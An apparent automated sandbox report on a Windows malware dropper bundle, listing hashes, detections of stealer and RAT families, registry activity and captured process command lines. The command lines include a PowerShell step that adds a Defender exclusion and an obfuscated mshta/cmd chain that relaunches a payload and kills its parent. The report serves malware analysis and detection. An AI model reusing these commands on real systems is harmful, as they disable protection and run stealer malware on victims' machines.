| MD5 | eef74b250b8faefb76f5e5d2f2477fb7 |
| SHA1 | 45efe669d04dd90979c747b5ec0c6bfab5e1f05a |
| SHA256 | 5e0e68e706bae10caa68edc625ad9ada909a277660583e8fbe5681a98170066c |
| SHA512 | c5cea32da6c581ad4377203bdd8685f56419ea47c96b0c552d7a7dcf7313d1ccb66abbd6cb45b9db7e64c7d3b3c1314f15c7e3eca5692943d41d223357ce2584 |
C:\Users\Admin\AppData\Local\Temp\7zS4C6B9096\Sat0546bbc15e4.exe
| MD5 | b4dd1caa1c9892b5710b653eb1098938 |
| SHA1 | 229e1b7492a6ec38d240927e5b3080dd1efadf4b |
| SHA256 | 6a617cd85f6e4fa3861d97d1f8197e909f6ca895a1c6139171d26068656a4c95 |
| SHA512 | 6285d20d85c2ca38c8dbb92bc8985371cddc9dbe042128e0cc6a48b24e52e5990a196b424a59aa84e551b67c91f5f58894dca2b9c5b130ea78076768e15ecae8 |
C:\Users\Admin\AppData\Local\Temp\7zS4C6B9096\Sat05ae182be20069e.exe
| MD5 | 449cb511789e9e861193d8c2107d1020 |
| SHA1 | e891b447c93c87d227ffcde5ce6a82b3a423dad7 |
| SHA256 | 46bc001c7806541de50090261435c6e3684b36187b3be11ddb0a4b9e0e381a27 |
| SHA512 | d85d6ca69db7cf431ec5076cc7d0f5e75c14d70efb665cc0b3ab913d0e50deeda9e8192e1d32ed7fda9a2285ee4d8fdbe0afd14fba130a49da0895f65ee6f488 |
C:\Users\Admin\AppData\Local\Temp\7zS4C6B9096\Sat058b772138cf0f3.exe
| MD5 | fa0bea4d75bf6ff9163c00c666b55e16 |
| SHA1 | eabec72ca0d9ed68983b841b0d08e13f1829d6b5 |
| SHA256 | 0e21c5b0e337ba65979621f2e1150df1c62e0796ffad5fe8377c95a1abf135af |
| SHA512 | 9d9a20024908110e1364d6d1faf9b116adbad484636131f985310be182c13bb21521a73ee083005198e5e383120717562408f86a798951b48f50405d07a9d1a2 |
C:\Users\Admin\AppData\Local\Temp\7zS4C6B9096\Sat05a28e92796e93d.exe
| MD5 | b7f786e9b13e11ca4f861db44e9fdc68 |
| SHA1 | bcc51246a662c22a7379be4d8388c2b08c3a3248 |
| SHA256 | f8987faadabfe4fd9c473ac277a33b28030a7c2a3ea20effc8b27ae8df32ddf6 |
| SHA512 | 53185e79e9027e87d521aef18488b57b900d3415ee132c3c058ed49c5918dd53a6259463c976928e463ccc1e058d1c9c07e86367538c6bed612ede00c6c0f1a5 |
C:\Users\Admin\AppData\Local\Temp\7zS4C6B9096\Sat056c52386ee94b16c.exe
| MD5 | e7794f5a37084395732431d9919b63f7 |
| SHA1 | debd5b546598180d1aad7a1ac3487043c3251dc8 |
| SHA256 | 5ded25988670504a175bbd570c1296c0935faeffae656d3c2620849fe487c9dc |
| SHA512 | ffcbd3898b31773064c843df3edd3b249f81b1f221f57fe5a8c071af7ba4fc2f2eb44d130d14e18a63acecac8d0617760c6f9b8529b740072f88afcd3ede1586 |
C:\Users\Admin\AppData\Local\Temp\7zS4C6B9096\Sat05786a45dda23f71f.exe
| MD5 | 63c74efb44e18bc6a0cf11e4d496ca51 |
| SHA1 | 04a8ed3cf2d1b29b644fbb65fee5a3434376dfa0 |
| SHA256 | be76e36b5b66b15087662720d920e31d1bc718f4ed0861b97f10ef85bfb09f3c |
| SHA512 | 7cba62ff083db883cd172f6104b149bf3cf0b8836407d88093efff8d7bd4bc21ea4f3c951448f1c57b9eb33ca849a86731a2ac4d9c81793456e7ed009e20e402 |
C:\Users\Admin\AppData\Local\Temp\7zS4C6B9096\Sat053d2789b60d.exe
| MD5 | 118cf2a718ebcf02996fa9ec92966386 |
| SHA1 | f0214ecdcb536fe5cce74f405a698c1f8b2f2325 |
| SHA256 | 7047db11a44cfcd1965dcf6ac77d650f5bb9c4282bf9642614634b09f3dd003d |
| SHA512 | fe5355b6177f81149013c444c244e540d04fbb2bcd2bf3bb3ea9e8c8152c662d667a968a35b24d1310decb1a2db9ac28157cda85e2ef69efee1c9152b0f39089 |
C:\Users\Admin\AppData\Local\Temp\7zS4C6B9096\Sat053bd2e87da.exe
| MD5 | 09aafd22d1ba00e6592f5c7ea87d403c |
| SHA1 | b4208466b9391b587533fe7973400f6be66422f3 |
| SHA256 | da137a976b0690462ffbe4d94bf04f4e9d972b62d3672bc3b6e69efb9dc004d4 |
| SHA512 | 455189206c764b73f1753f8221a01c6a1f25d530dd5629f503cec1d519a1117666ecf593ba0896e7b72c74681857ce3a5245e35c799be81012532157d0ac74fd |
\Users\Admin\AppData\Local\Temp\is-NKU50.tmp\Sat058b772138cf0f3.tmp
| MD5 | f39995ceebd91e4fb697750746044ac7 |
| SHA1 | 97613ba4b157ed55742e1e03d4c5a9594031cd52 |
| SHA256 | 435fd442eec14e281e47018d4f9e4bbc438ef8179a54e1a838994409b0fe9970 |
| SHA512 | 1bdb43840e274cf443bf1fabd65ff151b6f5c73621cd56f9626360929e7ef4a24a057bce032ac38940eda7c7dca42518a8cb61a7a62cc4b63b26e187a539b4a0 |
C:\Users\Admin\AppData\Local\Temp\7zS4C6B9096\Sat057428ebfd0d.exe
| MD5 | 2788816cd4550345722575b89942f5a1 |
| SHA1 | 0bbc543fc2970415d3a5011b2534f9269ff1d185 |
| SHA256 | 2c35fb66fe7c2035e09001fccf59a36781c10252d80affaf76705c2467cb2161 |
| SHA512 | 9ebf21835e55b1b5a653272f9abffcf146d0a61a484e4f1d9da568d864ae26bfd7bd2a7532d409eb6f6c3fcc5b4d5f1ac5282d4b35390b68bc0e563cfe10f96d |
C:\ProgramData\Garbage Cleaner\Bunifu_UI_v1.5.3.dll
| MD5 | 6445250d234e789c0c2afe69f119e326 |
| SHA1 | 03074f75c0ff50783d8c2e32d96e39b746540f66 |
| SHA256 | 2e6cd9433e66a9ebde268bc6949d4660de441790bd39ffc9cb0f4caaeb44320f |
| SHA512 | ecd094a4d026378f85435f8a2dc16c92c033aff92ba126d8bbb22d6b279b842d417f4df0f63199ea248d0ec64b9679acb5a1f835560d8e3c5b84be492cc0e68e |
C:\Users\Admin\AppData\Local\Temp\f77fb5f.exe
| MD5 | 99c8a5f7c87b4ec0ac66592a85e129f5 |
| SHA1 | 3699ef050962cfa6e3d6440a941396c9f022ea52 |
| SHA256 | 899c95d880933fc5a12f409c8e7821148ef0f9b4a28c226cb9cc6f44caacdbad |
| SHA512 | a3af8e0340d85cc0d83ed0824c98ff1de2aba7d73299ce47ab136df40c44ed34acd5e06d80d22a61b2963bd6c5586d80d446b205aa1e9ddad27b3ba4396b1b18 |
Analysis: behavioral2
Detonation Overview
Submitted
2024-11-08 00:10
Reported
2024-11-08 00:13
Platform
win10v2004-20241007-en
Max time kernel
82s
Max time network
151s
Command Line
Signatures
Detect Fabookie payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Fabookie
Fabookie family
GCleaner
Gcleaner family
NullMixer
Nullmixer family
OnlyLogger
Onlylogger family
RedLine
RedLine payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Redline family
SectopRAT
SectopRAT payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Sectoprat family
Socelars
Socelars family
Socelars payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
OnlyLogger payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
ASPack v2.12-2.42
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\9265b09595c59007e116c60605c28bd616387cf0dff79c7db8c5880e23cfef8e.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\7zS4F803977\Sat0546bbc15e4.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\SkVPVS3t6Y8W.EXe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\7zS4F803977\Sat0556e72238ef5897.exe | N/A |
Executes dropped EXE
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS4F803977\setup_install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS4F803977\setup_install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS4F803977\setup_install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS4F803977\setup_install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS4F803977\setup_install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS4F803977\setup_install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-1MLFE.tmp\Sat058b772138cf0f3.tmp | N/A |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
Reads user/profile data of web browsers
Drops Chrome extension
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\hemlmgggokggmncimchkllhcjcaimcle\9.86.66_0\manifest.json | C:\Users\Admin\AppData\Local\Temp\7zS4F803977\Sat05ae182be20069e.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
Looks up geolocation information via web service
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 1692 set thread context of 936 | N/A | C:\Users\Admin\AppData\Local\Temp\7zS4F803977\Sat053bd2e87da.exe | C:\Users\Admin\AppData\Local\Temp\7zS4F803977\Sat053bd2e87da.exe |
Browser Information Discovery
Enumerates physical storage devices
Program crash
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS4F803977\Sat0546bbc15e4.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS4F803977\Sat053bd2e87da.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\9265b09595c59007e116c60605c28bd616387cf0dff79c7db8c5880e23cfef8e.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\SkVPVS3t6Y8W.EXe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS4F803977\Sat0556e72238ef5897.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\control.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS4F803977\Sat053d2789b60d.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\e589555.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS4F803977\setup_install.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS4F803977\Sat058b772138cf0f3.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS4F803977\Sat056c52386ee94b16c.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-1MLFE.tmp\Sat058b772138cf0f3.tmp | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS4F803977\Sat05ae182be20069e.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS4F803977\Sat05786a45dda23f71f.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS4F803977\Sat05ff081f766eeabb8.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS4F803977\Sat053bd2e87da.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\7zS4F803977\Sat056c52386ee94b16c.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\7zS4F803977\Sat056c52386ee94b16c.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\7zS4F803977\Sat056c52386ee94b16c.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133754982874254407" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\9265b09595c59007e116c60605c28bd616387cf0dff79c7db8c5880e23cfef8e.exe
"C:\Users\Admin\AppData\Local\Temp\9265b09595c59007e116c60605c28bd616387cf0dff79c7db8c5880e23cfef8e.exe"
C:\Users\Admin\AppData\Local\Temp\7zS4F803977\setup_install.exe
"C:\Users\Admin\AppData\Local\Temp\7zS4F803977\setup_install.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sat057428ebfd0d.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sat053d2789b60d.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sat053bd2e87da.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sat05786a45dda23f71f.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sat0556e72238ef5897.exe /mixone
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sat056c52386ee94b16c.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sat05a28e92796e93d.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sat05d374c30e.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sat05ff081f766eeabb8.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sat05ae182be20069e.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sat058b772138cf0f3.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sat0546bbc15e4.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 2636 -ip 2636
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
C:\Users\Admin\AppData\Local\Temp\7zS4F803977\Sat057428ebfd0d.exe
Sat057428ebfd0d.exe
C:\Users\Admin\AppData\Local\Temp\7zS4F803977\Sat053d2789b60d.exe
Sat053d2789b60d.exe
C:\Users\Admin\AppData\Local\Temp\7zS4F803977\Sat05786a45dda23f71f.exe
Sat05786a45dda23f71f.exe
C:\Users\Admin\AppData\Local\Temp\7zS4F803977\Sat053bd2e87da.exe
Sat053bd2e87da.exe
C:\Users\Admin\AppData\Local\Temp\7zS4F803977\Sat056c52386ee94b16c.exe
Sat056c52386ee94b16c.exe
C:\Users\Admin\AppData\Local\Temp\7zS4F803977\Sat0556e72238ef5897.exe
Sat0556e72238ef5897.exe /mixone
C:\Users\Admin\AppData\Local\Temp\7zS4F803977\Sat05ff081f766eeabb8.exe
Sat05ff081f766eeabb8.exe
C:\Users\Admin\AppData\Local\Temp\7zS4F803977\Sat05d374c30e.exe
Sat05d374c30e.exe
C:\Users\Admin\AppData\Local\Temp\7zS4F803977\Sat058b772138cf0f3.exe
Sat058b772138cf0f3.exe
C:\Users\Admin\AppData\Local\Temp\7zS4F803977\Sat05ae182be20069e.exe
Sat05ae182be20069e.exe
C:\Users\Admin\AppData\Local\Temp\7zS4F803977\Sat05a28e92796e93d.exe
Sat05a28e92796e93d.exe
C:\Users\Admin\AppData\Local\Temp\7zS4F803977\Sat0546bbc15e4.exe
Sat0546bbc15e4.exe
C:\Users\Admin\AppData\Local\Temp\is-1MLFE.tmp\Sat058b772138cf0f3.tmp
"C:\Users\Admin\AppData\Local\Temp\is-1MLFE.tmp\Sat058b772138cf0f3.tmp" /SL5="$40280,239846,156160,C:\Users\Admin\AppData\Local\Temp\7zS4F803977\Sat058b772138cf0f3.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2636 -s 592
C:\Users\Admin\AppData\Local\Temp\7zS4F803977\Sat053bd2e87da.exe
C:\Users\Admin\AppData\Local\Temp\7zS4F803977\Sat053bd2e87da.exe
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" vbSCRiPt: cloSe(cReATEOBJecT ("WScRIPt.SHelL" ).RUn ("C:\Windows\system32\cmd.exe /c copY /Y ""C:\Users\Admin\AppData\Local\Temp\7zS4F803977\Sat0546bbc15e4.exe"" SkVPVS3t6Y8W.EXe && STart SkVPVs3t6Y8W.exE /phmOv~geMVZhd~P51OGqJQYYUK & iF """" == """" for %U In ( ""C:\Users\Admin\AppData\Local\Temp\7zS4F803977\Sat0546bbc15e4.exe"" ) do taskkill -F -Im ""%~nXU"" ", 0, trUE) )
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 1864 -ip 1864
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1864 -s 356
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c copY /Y "C:\Users\Admin\AppData\Local\Temp\7zS4F803977\Sat0546bbc15e4.exe" SkVPVS3t6Y8W.EXe &&STart SkVPVs3t6Y8W.exE /phmOv~geMVZhd~P51OGqJQYYUK & iF ""== "" for %U In ( "C:\Users\Admin\AppData\Local\Temp\7zS4F803977\Sat0546bbc15e4.exe" ) do taskkill -F -Im "%~nXU"
C:\Users\Admin\AppData\Local\Temp\SkVPVS3t6Y8W.EXe
SkVPVs3t6Y8W.exE /phmOv~geMVZhd~P51OGqJQYYUK
C:\Windows\SysWOW64\taskkill.exe
taskkill -F -Im "Sat0546bbc15e4.exe"
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" vbSCRiPt: cloSe(cReATEOBJecT ("WScRIPt.SHelL" ).RUn ("C:\Windows\system32\cmd.exe /c copY /Y ""C:\Users\Admin\AppData\Local\Temp\SkVPVS3t6Y8W.EXe"" SkVPVS3t6Y8W.EXe && STart SkVPVs3t6Y8W.exE /phmOv~geMVZhd~P51OGqJQYYUK & iF ""/phmOv~geMVZhd~P51OGqJQYYUK "" == """" for %U In ( ""C:\Users\Admin\AppData\Local\Temp\SkVPVS3t6Y8W.EXe"" ) do taskkill -F -Im ""%~nXU"" ", 0, trUE) )
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c copY /Y "C:\Users\Admin\AppData\Local\Temp\SkVPVS3t6Y8W.EXe" SkVPVS3t6Y8W.EXe &&STart SkVPVs3t6Y8W.exE /phmOv~geMVZhd~P51OGqJQYYUK & iF "/phmOv~geMVZhd~P51OGqJQYYUK "== "" for %U In ( "C:\Users\Admin\AppData\Local\Temp\SkVPVS3t6Y8W.EXe" ) do taskkill -F -Im "%~nXU"
C:\Windows\SysWOW64\mshta.exe
